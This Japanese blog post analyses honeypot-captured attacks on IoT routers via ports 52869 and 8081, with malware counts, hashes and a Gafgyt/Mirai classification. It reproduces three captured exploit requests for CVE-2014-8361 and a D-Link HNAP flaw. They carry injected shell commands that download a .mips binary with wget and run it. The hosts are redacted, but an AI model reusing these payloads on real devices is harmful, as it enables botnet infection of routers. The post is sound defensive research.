【ハニーポットで気になった】52869/tcp および8081/tcp宛を狙った攻撃ってどんなもの?
目次
1.調査しようと思ったきっかけ
今回は52869/tcp および8081/tcp宛への拡張子が「.mips」であるマルウェアのダウンロードを狙った通信に関する記事を書きたいと思います。書こうと思ったきっかけは、以下の通りです。
①80ポートの通信を監視しているハニーポッターはtwitter上でもいますが、80ポート以外を監視しているハニーポッタは少なく、需要があるかと思ったため
②普段のブログでダウンロードが多いが、あまり分析できていなかったため
今回、拡張子が「.mips」であるものに絞ったのは自分のハニーポットで検知したものの大半が「.mips」であったためです。
2. 52869/tcp および8081/tcp宛を狙った通信
自分のハニーポット(Honeytrap)で52869/tcp および8081/tcp宛を狙った通信を多く検知しており、実際に検知している主な通信は以下となります。
①
POST /picsdesc.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:52869
Content-Length: 661
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: */*
User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64
Connection: keep-alive
<?xml version="1.0" ?>
<s:Envelope xmlns:s="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/" s:encodingStyle="hxxp://schemas[.]xmlsoap[.]orgg/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>xxxxx</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>xxxxx</NewInternalPort>
<NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/xxx/xxx.mips -O xxx/xxx`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>syncthing</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</u:AddPortMapping>
</s:Body>
</s:Envelope>
②
POST /wanipcn.xml HTTP/1.1
Host: xxx.xxx.xxx.xxx:52869
Content-Length: 627
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*
User-Agent: python-requests/2.4.3 CPython/2.7.9 Linux/3.16.0-5-amd64
Connection: keep-alive
<?xml version="1.0" ?>
<s:Envelope xmlns:s="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/" s:encodingStyle="hxxp://schemas[.]xmlsoap[.]org/soap/encoding/">
<s:Body>
<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>xxxxx</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>xxxxx</NewInternalPort>
<NewInternalClient>`cd /tmp/; wget hxxp://xxx.xxx.xxx.xxx/xxx.mips -O d`</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>syncthing</NewPortMappingDescription>
<NewLeaseDuration>0</NewLeaseDuration>
</u:AddPortMapping>
</s:Body>
</s:Envelope>
③
POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
SOAPAction: hxxp://purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://xxx.xxx.xxx.xxx/xxx.mips && chmod +x xxx.mips;./xxx.mips`
Content-Length: 640
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="hxxp://www[.]w3[.]org/2001/XMLSchema-instance" xmlns:xsd="hxxp://www[.]w3[.]org/2001/XMLSchema" xmlns:soap="hxxp://schemas[.]xmlsoap[.]org/soap/envelope/">
<soap:Body><AddPortMapping xmlns="hxxp://purenetworks[.]com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.xxx</InternalClient>
<PortMappingProtocol>TCP</PortMappingProtocol>
<ExternalPort>1234</ExternalPort>
<InternalPort>1234</InternalPort></AddPortMapping>
</soap:Body>
</soap:Envelope>
①および②は、対象ポートは 52869/tcpであり、CVE番号 2014-8361 に該当する Realtek SDK の miniigd SOAP サービスにおける任意のコードを実行される脆弱性を狙ったものです。 miniigdデーモンを含むRealtek SDKを利用するさまざまなデバイスが対象であり、様々なルータが対象となっています。
JVNDB-2014-008039 - JVN iPedia - 脆弱性対策情報データベース
③はD-Link DIR-850L のウェブ管理インターフェースにおける HNAP プロトコルデータの脆弱性を狙ったものとなります。
JVNDB-2017-001662 - JVN iPedia - 脆弱性対策情報データベース
いずれもIoT製品にターゲットを絞った攻撃であり、wgetコマンドでマルウェアを取得してから、パーミッションを変更し、実行する流れです。
3. 検知数
拡張子 mipsを含むダウンロードを試みる通信について、Honeytrapの収集開始時期である8/7からの統計情報となります。検知数は全3182件となります。
※対象ポートは 52869/tcp および8081/tcp
9月および10月に検知数が多いですが、最低でも400件近くの検知をしています。
52869/tcp および8081/tcpの検知数の内訳ですが、全3182件の内、8081/tcpが126件であり、他は全て52869/tcpでした。
4.マルウェア別検知数
マルウェア | 検知数 | 初回観測 | ハッシュ値 |
elf.mips | 1017 | 2018/8/7 | c5dff296b4f8a176223082527cd58402df2a7e5bcf4414f961d5312530ed5ee6 5d72f22d6c387664b23cf4ea3080673885b73a9bea5caff7eb84fd3d0fd1a00b |
Demon.mips | 486 | 2018/11/12 | 8691c54c84d6d51a0774b7546805482a3d8fb7c5363f472cb61112579d164867 4d2da606e565090196b68dda4ab3a8e0ff70b609263756119e09dfd3605df06d |
loli.mips | 329 | 2018/10/13 | |
seraph.mips | 322 | 2018/10/4 | 9296d11e4d72e95d21dc5bc395c5c3103fb2c467e200f180c10bab3dfe1df856 |
jiren.mips | 182 | 2018/11/13 | 7bc98d940f7d2ea7aa5614ecaa529559eee2c4b954d08c2e0aa3b76ca1f60d53 |
tenshimips.mips | 170 | 2018/9/4 | |
sora.mips | 109 | 2018/8/8 | |
loli.lol.mips | 99 | 2018/9/9 | 3d57de9c546ae22e688c2aa3c67f1477ed53ff415facb8410d0964b4a7e367c2 |
izuku.mips | 91 | 2018/8/29 | b73ce9b0bd3fc58419443cbea301349af783d690ca1133d8548ea89d1bba003c |
Josho.mips | 62 | 2018/10/8 | |
poof.mips | 60 | 2018/11/26 | d5b52575d768154b2551b861e568a8d7c8266cc457f60589d3b850858b6dc16f |
hoho.mips | 44 | 2018/8/11 | |
8mips8.mips | 42 | 2018/8/9 | |
hakai.mips | 39 | 2018/10/18 | |
oxy.mips | 33 | 2018/9/3 | |
vodity.mips | 29 | 2018/12/3 | d5b52575d768154b2551b861e568a8d7c8266cc457f60589d3b850858b6dc16f |
keiji.mips | 19 | 2018/9/14 | d5b52575d768154b2551b861e568a8d7c8266cc457f60589d3b850858b6dc16f |
kenjiro.mips | 9 | 2018/8/27 | 3eb6c453b75d71ce7bacd402ef86674616e6cf3237e155972e7940c9bb119b04 |
mips.mips | 8 | 2018/12/26 | |
salvia.mips | 7 | 2018/8/7 | 2b9e47258b93ff77fc806de36036a12da06827ad3d188dcbf36349f148797768 |
apep.mips | 6 | 2018/9/21 | a0925fc32573e5f4edfbf4d321ebd9813f3f598c22d8e23105d1b3ab33c0cc1a |
ntpd.mips | 3 | 2018/8/26 | 2f00779d7a25ef918f4c7c9129c2e3f3a4bc48b552000196d552b93eaea2c79f |
kratos.mips | 3 | 2018/9/12 | f8bda8dd8ce8538cff98edb2cf7ef2a64f4a6b96e9dba1ed41a1bfb212d31851 |
Botnet.mips | 3 | 2018/10/20 | 2d7f2c2167939f72bdf25f39acd135b07d00740f0dce87143c4096599815c8b9 |
shit.mips | 2 | 2018/9/1 | 3e874b965844ac82a5f1d479ab1113ea4385f5ed82a2d7b3e243b44273a1a658 |
yakuza.mips | 2 | 2018/10/7 | a0925fc32573e5f4edfbf4d321ebd9813f3f598c22d8e23105d1b3ab33c0cc1a |
qq.mips | 2 | 2018/12/8 | 6c7214e0aa6ddd8e423055d9117c1474116d365e447bffe9f82e76969c66fa82 |
Cult.mips | 1 | 2018/8/14 | |
gemini.mips | 1 | 2018/10/12 | 782a30bd2086ae6327ae9ac12185f35890fef888f182a3e51826103813c80ee1 |
shiro.mips | 1 | 2018/11/27 | |
xd.mips | 1 | 2018/12/27 | 1602451bebdfbf9ded1150204aeccc64ccce8c2b7700641020842daf9fd32c2d |
※ハッシュ値はVirusTotalにURLを入力して、ハッシュ値が取得できたものを記載しており、実際にwgetコマンドなどで検体を取得して計算したものではありません。
空白のものはVirusTotalではハッシュ値が取得できなかったものとなります。
Miraiの亜種ではないもの(Gafgyt の亜種)ものも含まれています。こちらはtwitterで気がつきました。ハッシュ値が分かっているものをVirusTotalで調査したところ、分類は以下となります。
◾️Gafgyt 亜種
Gafgyt(ガフジット)はDDoS攻撃を仕掛ける機能を備えたマルウェアであり、2014年に最初に発見され、その後2015年初頭にソースコードが漏洩しています。ソースコードが漏洩しているため、こちらも亜種が作成しやすいものとなっています。
Linuxを狙う脅威の最新動向 | トレンドマイクロ セキュリティブログ
古いマルウェアを観察するシリーズ(2)Gafgyt - スープの上で
IoTボットネットの第二波?MiraiとGafgytの亜種ボットネットの検知数が増加 - 忙しい人のためのサイバーセキュリティニュース
<対象のマルウェア>
・elf.mips
・Demon.mips
・jiren.mips
・poof.mips
・vodity.mips
・keiji.mips
◾️Mirai亜種
IoT製品を狙った大規模なネットワーク攻撃の一部に利用可能な、遠隔操作できるボットにするマルウェアのことを指します。Miraiのソースコードが公開されて以来、様々なMiraiの亜種が次々と誕生しました。
<対象のマルウェア>
・seraph.mips
・loli.lol.mips
・izuku.mips
・salvia.mips
・apep.mips
・kratos.mips
・Botnet.mips
・shit.mips
・yakuza.mips
・qq.mips
・gemini.mips
・xd.mips
Gafgytの亜種と比較して、Miraiの亜種は種類が多い一方で、一つあたりの検知数が少ないのが特徴でした。機能の変更が頻繁であり、ターゲットを絞った上で攻撃をしているのでしょうか。Gafgytの亜種はelf.mipsおよびDemon.mipsが未だに多数検知しており、使いまわしていると推測されます。
なお、ポート 8081/tcp を狙ったマルウェアダウンロードは以下でした。
・kenjiro.mips
・kalon.mips
・Botnet.mips
本分類を月ごとにまとめてみると以下となります。
分類できないものは不明(おそらく、Gafgy亜種tかMirai亜種のどちらに分類されると思われます)としているため、正確な分析ではないですが、Mirai亜種の検知数に偏りがあることが分かりました。9月および10月に集中して検知した後、11月および12月での検知はほぼない状態でした。これにより、Miraiの亜種はある一定の時期のみに集中して攻撃を試みるのではないかと思われます。
なお、かなり細かい集計になってしまいが、マルウェアの種別ごとにまとめた記事は以下となります。
※もはや、種類が多すぎて、どのマルウェアか区別が困難ですが。。。。。。
Gafgyt亜種は9月までは主にelf.mipsの検知が多かったですが、10月にはelf.mipsとDemon.mipsが半分になり、11月はほぼDemon.mipsとなり、12月観測時点では Demon.mipsが主流となっていました。Mirai亜種と比べると種類が少なく、亜種を作成したら一定期間使い続ける傾向があるようです。
5.まとめ
・拡張子が mips であるファイルダウンロードを狙ったものは52869/tcp および8081/tcp宛の攻撃はCVE番号 2014-8361 に該当する Realtek SDK の miniigd SOAP サービスにおける任意のコードを実行される脆弱性を狙ったものが多い
・拡張子が mips であるファイルはGafgy亜種およびMirai亜種のインストールを狙ったものが多い
・Gafgyt亜種 の検知数は一定であるが、Mirai亜種については検知数にばらつきがある
・Gafgyt亜種は9月までは主にelf.mipsの検知が多かったが10月にはelf.mipsとDemon.mipsが半分になり、12月観測時点では Demon.mipsが主流
改めて、調査してみて今まで全てのMirai亜種だと思っていましたが、Gafgyt亜種も検知していることに気が付きました。今後は時間はかかるかも知れませんが、これらのマルウェアがどのような挙動をするかを分析し、どのような機能が追加されたなど調査できるようにしたいと考えています。
何か過不足やご指摘がございましたら、Twitterもしくは本ブログなどで教えて頂けると幸いです。
Twitter
sec_chick@one_chick_sec
以上、52869/tcp および8081/tcp宛の攻撃に関する分析でした。